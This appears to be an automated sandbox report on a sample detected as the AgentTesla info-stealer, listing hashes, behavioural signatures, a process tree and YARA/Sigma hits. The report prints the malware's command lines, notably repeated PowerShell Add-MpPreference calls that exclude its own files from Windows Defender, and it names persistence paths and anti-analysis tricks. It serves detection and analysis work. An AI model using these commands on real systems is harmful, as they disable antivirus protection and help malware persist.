Loading ...

Play interactive tourEdit tour

Windows Analysis Report VknMvPoCXZ

Overview

General Information

Sample Name:VknMvPoCXZ (renamed file extension from none to exe)
Analysis ID:483863
MD5:0cecfa83ee6ea6dd1de38462bbedf15c
SHA1:de4dde34707658d98f50de8cf2a182bf7ded2a45
SHA256:a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2
Tags:AfiaWaveEnterprisesOyAgentTeslaexesigned
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Drops PE files with benign system names
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Sigma detected: Powershell Defender Exclusion
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • VknMvPoCXZ.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 3336 cmdline: 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5908 cmdline: 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2968 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5456 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1036 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6288 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 481F404B.exe (PID: 6392 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
      • AdvancedRun.exe (PID: 6644 cmdline: 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6204 cmdline: 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /SpecialRun 4101d8 6644 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 6784 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 7008 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4308 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4988 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_compiler.exe (PID: 6872 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • WerFault.exe (PID: 3880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5888 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6048 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4928 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4736 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 736 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5264 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 481F404B.exe (PID: 6852 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6512 cmdline: 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 3152 cmdline: 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /SpecialRun 4101d8 6512 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6992 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6952 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5900 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5532 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6820 cmdline: 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6692 cmdline: 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /SpecialRun 4101d8 6820 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 7112 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6152 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7132 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4496 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6932 cmdline: 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • svchost.exe (PID: 6876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 53 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                1.0.VknMvPoCXZ.exe.39197e0.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.0.VknMvPoCXZ.exe.39197e0.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    1.0.VknMvPoCXZ.exe.38d97c0.25.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 99 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, ProcessId: 2968
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, ProcessId: 2968
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132762180470220038.2968.DefaultAppDomain.powershell

                      Malware Analysis System Evasion:

                      barindex
                      Sigma detected: Powershell adding suspicious path to exclusion listShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, ProcessId: 5456

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: VknMvPoCXZ.exeVirustotal: Detection: 47%Perma Link
                      Source: VknMvPoCXZ.exeReversingLabs: Detection: 44%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeReversingLabs: Detection: 44%
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeReversingLabs: Detection: 44%

                      Exploits:

                      barindex
                      Yara detected UAC Bypass using CMSTPShow sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
